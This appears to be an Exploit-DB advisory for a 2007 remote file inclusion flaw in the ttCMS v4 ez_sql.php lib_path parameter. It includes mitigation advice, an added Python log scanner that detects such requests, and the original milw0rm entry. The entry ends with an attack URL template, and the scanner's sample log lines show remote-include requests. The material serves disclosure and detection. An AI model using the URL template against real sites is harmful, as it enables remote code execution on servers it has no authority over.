vendor: ttCMS
by: Kacper (a.k.a Rahim)
CVSS: 7.5 (HIGH)
CWE: RFI (Remote File Inclusion)
Product Name: ttCMS
Affected Version From: ttCMS v4 and earlier
Affected Version To: ttCMS v4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability

This exploit allows an attacker to include remote files by manipulating the 'lib_path' parameter in the ez_sql.php file of ttCMS version 4 or earlier.

Mitigation:

Upgrade to a newer version of ttCMS that has fixed this vulnerability or implement proper input validation and sanitization.
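
As an added detection example (not part of the advisory or of ttCMS), the Python below flags access-log requests to `ez_sql.php` whose `lib_path` value points at a remote resource. The log format, the verdict names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path and parameter are the ones named in the advisory.
TARGET_SCRIPT = "/lib/db/ez_sql.php"
PARAM = "lib_path"

# Request field of a common/combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Values that are not a plain local path: scheme or stream wrapper
# (http://, ftp://, php://, data:), protocol-relative //host, UNC \\host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)

def classify(line):
    """Return None, 'param-supplied' or 'remote-include' for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not unquote(url.path).lower().endswith(TARGET_SCRIPT):
        return None
    verdict = None
    # parse_qsl percent-decodes, so http%3A%2F%2F... is matched too.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        # PHP turns dots and spaces in parameter names into underscores.
        if key.replace(".", "_").replace(" ", "_") != PARAM:
            continue
        if REMOTE.match(value):
            return "remote-include"
        verdict = "param-supplied"  # unusual for a library file; review
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Mar/2007:10:01:02 +0000] "GET /cms/lib/db/ez_sql.php?lib_path=http://files.example.org/inc.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [24/Mar/2007:10:01:09 +0000] "GET /cms/lib/db/ez_sql.php?lib_path=ftp%3A%2F%2Ffiles.example.org%2Finc HTTP/1.1" 200 512',
    '198.51.100.4 - - [24/Mar/2007:10:02:30 +0000] "GET /cms/lib/db/ez_sql.php?lib_path=../lib/ HTTP/1.1" 200 98',
    '198.51.100.9 - - [24/Mar/2007:10:03:11 +0000] "GET /cms/index.php?page=news HTTP/1.1" 200 4096',
]
```

Only the query string is inspected, because request bodies do not appear in standard access logs.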
Source

Exploit-DB raw data:

DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper (a.k.a Rahim)
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam 
--------------------------------------------
Greetings to everyone from the IRC channel and the DEVIL TEAM forum.



ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability
script download/homepage: http://www.ttcms.com/v4/


--------------------------------------------
Vulnerabilities:

http://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code]

# milw0rm.com [2007-03-24]